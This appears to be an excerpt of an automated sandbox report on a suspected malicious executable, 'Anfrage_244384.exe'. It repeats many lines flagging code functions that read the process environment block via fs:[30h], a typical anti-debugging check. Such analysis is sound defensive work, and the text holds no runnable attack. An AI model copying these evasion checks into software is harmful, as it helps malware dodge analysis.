Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471705E mov ebx, dword ptr fs:[00000030h]	4_2_3471705E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471705E mov eax, dword ptr fs:[00000030h]	4_2_3471705E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B052 mov eax, dword ptr fs:[00000030h]	4_2_3469B052
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473903E mov eax, dword ptr fs:[00000030h]	4_2_3473903E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473903E mov eax, dword ptr fs:[00000030h]	4_2_3473903E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473903E mov eax, dword ptr fs:[00000030h]	4_2_3473903E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473903E mov eax, dword ptr fs:[00000030h]	4_2_3473903E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346950E4 mov eax, dword ptr fs:[00000030h]	4_2_346950E4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346950E4 mov ecx, dword ptr fs:[00000030h]	4_2_346950E4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov ecx, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov ecx, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov ecx, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov ecx, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347450D9 mov eax, dword ptr fs:[00000030h]	4_2_347450D9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED0C0 mov eax, dword ptr fs:[00000030h]	4_2_346ED0C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED0C0 mov eax, dword ptr fs:[00000030h]	4_2_346ED0C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346990DB mov eax, dword ptr fs:[00000030h]	4_2_346990DB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D08D mov eax, dword ptr fs:[00000030h]	4_2_3466D08D
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FD080 mov eax, dword ptr fs:[00000030h]	4_2_346FD080
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FD080 mov eax, dword ptr fs:[00000030h]	4_2_346FD080
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34675096 mov eax, dword ptr fs:[00000030h]	4_2_34675096
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A909C mov eax, dword ptr fs:[00000030h]	4_2_346A909C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D090 mov eax, dword ptr fs:[00000030h]	4_2_3469D090
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D090 mov eax, dword ptr fs:[00000030h]	4_2_3469D090
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34709179 mov eax, dword ptr fs:[00000030h]	4_2_34709179
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745152 mov eax, dword ptr fs:[00000030h]	4_2_34745152
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669148 mov eax, dword ptr fs:[00000030h]	4_2_34669148
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669148 mov eax, dword ptr fs:[00000030h]	4_2_34669148
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669148 mov eax, dword ptr fs:[00000030h]	4_2_34669148
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669148 mov eax, dword ptr fs:[00000030h]	4_2_34669148
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34703140 mov eax, dword ptr fs:[00000030h]	4_2_34703140
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34703140 mov eax, dword ptr fs:[00000030h]	4_2_34703140
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34703140 mov eax, dword ptr fs:[00000030h]	4_2_34703140
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677152 mov eax, dword ptr fs:[00000030h]	4_2_34677152
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B136 mov eax, dword ptr fs:[00000030h]	4_2_3466B136
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B136 mov eax, dword ptr fs:[00000030h]	4_2_3466B136
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B136 mov eax, dword ptr fs:[00000030h]	4_2_3466B136
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B136 mov eax, dword ptr fs:[00000030h]	4_2_3466B136
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671131 mov eax, dword ptr fs:[00000030h]	4_2_34671131
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671131 mov eax, dword ptr fs:[00000030h]	4_2_34671131
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]	4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347171F9 mov esi, dword ptr fs:[00000030h]	4_2_347171F9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346751ED mov eax, dword ptr fs:[00000030h]	4_2_346751ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347431E1 mov eax, dword ptr fs:[00000030h]	4_2_347431E1
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AD1D0 mov eax, dword ptr fs:[00000030h]	4_2_346AD1D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AD1D0 mov ecx, dword ptr fs:[00000030h]	4_2_346AD1D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347451CB mov eax, dword ptr fs:[00000030h]	4_2_347451CB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347211A4 mov eax, dword ptr fs:[00000030h]	4_2_347211A4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347211A4 mov eax, dword ptr fs:[00000030h]	4_2_347211A4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347211A4 mov eax, dword ptr fs:[00000030h]	4_2_347211A4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347211A4 mov eax, dword ptr fs:[00000030h]	4_2_347211A4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468B1B0 mov eax, dword ptr fs:[00000030h]	4_2_3468B1B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34725180 mov eax, dword ptr fs:[00000030h]	4_2_34725180
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34725180 mov eax, dword ptr fs:[00000030h]	4_2_34725180
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C7190 mov eax, dword ptr fs:[00000030h]	4_2_346C7190
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473D26B mov eax, dword ptr fs:[00000030h]	4_2_3473D26B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473D26B mov eax, dword ptr fs:[00000030h]	4_2_3473D26B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B1270 mov eax, dword ptr fs:[00000030h]	4_2_346B1270
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B1270 mov eax, dword ptr fs:[00000030h]	4_2_346B1270
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34699274 mov eax, dword ptr fs:[00000030h]	4_2_34699274
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472B256 mov eax, dword ptr fs:[00000030h]	4_2_3472B256
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472B256 mov eax, dword ptr fs:[00000030h]	4_2_3472B256
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669240 mov eax, dword ptr fs:[00000030h]	4_2_34669240
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669240 mov eax, dword ptr fs:[00000030h]	4_2_34669240
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A724D mov eax, dword ptr fs:[00000030h]	4_2_346A724D
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FD250 mov ecx, dword ptr fs:[00000030h]	4_2_346FD250
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745227 mov eax, dword ptr fs:[00000030h]	4_2_34745227
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A7208 mov eax, dword ptr fs:[00000030h]	4_2_346A7208
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A7208 mov eax, dword ptr fs:[00000030h]	4_2_346A7208
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B2F0 mov eax, dword ptr fs:[00000030h]	4_2_3471B2F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B2F0 mov eax, dword ptr fs:[00000030h]	4_2_3471B2F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F2F8 mov eax, dword ptr fs:[00000030h]	4_2_3472F2F8
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347452E2 mov eax, dword ptr fs:[00000030h]	4_2_347452E2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346692FF mov eax, dword ptr fs:[00000030h]	4_2_346692FF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346792C5 mov eax, dword ptr fs:[00000030h]	4_2_346792C5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346792C5 mov eax, dword ptr fs:[00000030h]	4_2_346792C5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3469B2C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3469B2C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3469B2C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3469B2C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3469B2C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3469B2C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3469B2C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B2D3 mov eax, dword ptr fs:[00000030h]	4_2_3466B2D3
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B2D3 mov eax, dword ptr fs:[00000030h]	4_2_3466B2D3
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B2D3 mov eax, dword ptr fs:[00000030h]	4_2_3466B2D3
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F2D0 mov eax, dword ptr fs:[00000030h]	4_2_3469F2D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F2D0 mov eax, dword ptr fs:[00000030h]	4_2_3469F2D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h]	4_2_346852A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h]	4_2_346852A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h]	4_2_346852A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h]	4_2_346852A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347072A0 mov eax, dword ptr fs:[00000030h]	4_2_347072A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347072A0 mov eax, dword ptr fs:[00000030h]	4_2_347072A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F92BC mov eax, dword ptr fs:[00000030h]	4_2_346F92BC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F92BC mov eax, dword ptr fs:[00000030h]	4_2_346F92BC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F92BC mov ecx, dword ptr fs:[00000030h]	4_2_346F92BC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F92BC mov ecx, dword ptr fs:[00000030h]	4_2_346F92BC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h]	4_2_347392A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h]	4_2_347392A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h]	4_2_347392A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h]	4_2_347392A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A329E mov eax, dword ptr fs:[00000030h]	4_2_346A329E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A329E mov eax, dword ptr fs:[00000030h]	4_2_346A329E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745283 mov eax, dword ptr fs:[00000030h]	4_2_34745283
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34713370 mov eax, dword ptr fs:[00000030h]	4_2_34713370
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F367 mov eax, dword ptr fs:[00000030h]	4_2_3472F367
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677370 mov eax, dword ptr fs:[00000030h]	4_2_34677370
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677370 mov eax, dword ptr fs:[00000030h]	4_2_34677370
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677370 mov eax, dword ptr fs:[00000030h]	4_2_34677370
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D34C mov eax, dword ptr fs:[00000030h]	4_2_3466D34C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D34C mov eax, dword ptr fs:[00000030h]	4_2_3466D34C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745341 mov eax, dword ptr fs:[00000030h]	4_2_34745341
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669353 mov eax, dword ptr fs:[00000030h]	4_2_34669353
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669353 mov eax, dword ptr fs:[00000030h]	4_2_34669353
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F32A mov eax, dword ptr fs:[00000030h]	4_2_3469F32A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667330 mov eax, dword ptr fs:[00000030h]	4_2_34667330
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473132D mov eax, dword ptr fs:[00000030h]	4_2_3473132D
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473132D mov eax, dword ptr fs:[00000030h]	4_2_3473132D
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F930B mov eax, dword ptr fs:[00000030h]	4_2_346F930B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F930B mov eax, dword ptr fs:[00000030h]	4_2_346F930B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F930B mov eax, dword ptr fs:[00000030h]	4_2_346F930B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347453FC mov eax, dword ptr fs:[00000030h]	4_2_347453FC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F3E6 mov eax, dword ptr fs:[00000030h]	4_2_3472F3E6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472B3D0 mov ecx, dword ptr fs:[00000030h]	4_2_3472B3D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347113B9 mov eax, dword ptr fs:[00000030h]	4_2_347113B9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347113B9 mov eax, dword ptr fs:[00000030h]	4_2_347113B9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347113B9 mov eax, dword ptr fs:[00000030h]	4_2_347113B9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A33A0 mov eax, dword ptr fs:[00000030h]	4_2_346A33A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A33A0 mov eax, dword ptr fs:[00000030h]	4_2_346A33A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346933A5 mov eax, dword ptr fs:[00000030h]	4_2_346933A5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474539D mov eax, dword ptr fs:[00000030h]	4_2_3474539D
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C739A mov eax, dword ptr fs:[00000030h]	4_2_346C739A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C739A mov eax, dword ptr fs:[00000030h]	4_2_346C739A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681C60 mov eax, dword ptr fs:[00000030h]	4_2_34681C60
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A1C7C mov eax, dword ptr fs:[00000030h]	4_2_346A1C7C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h]	4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov ecx, dword ptr fs:[00000030h]	4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h]	4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h]	4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FC4F mov eax, dword ptr fs:[00000030h]	4_2_3472FC4F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34741C3C mov eax, dword ptr fs:[00000030h]	4_2_34741C3C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABC3B mov esi, dword ptr fs:[00000030h]	4_2_346ABC3B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h]	4_2_3473DC27
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h]	4_2_3473DC27
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h]	4_2_3473DC27
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F9C32 mov eax, dword ptr fs:[00000030h]	4_2_346F9C32
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474BC01 mov eax, dword ptr fs:[00000030h]	4_2_3474BC01
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474BC01 mov eax, dword ptr fs:[00000030h]	4_2_3474BC01
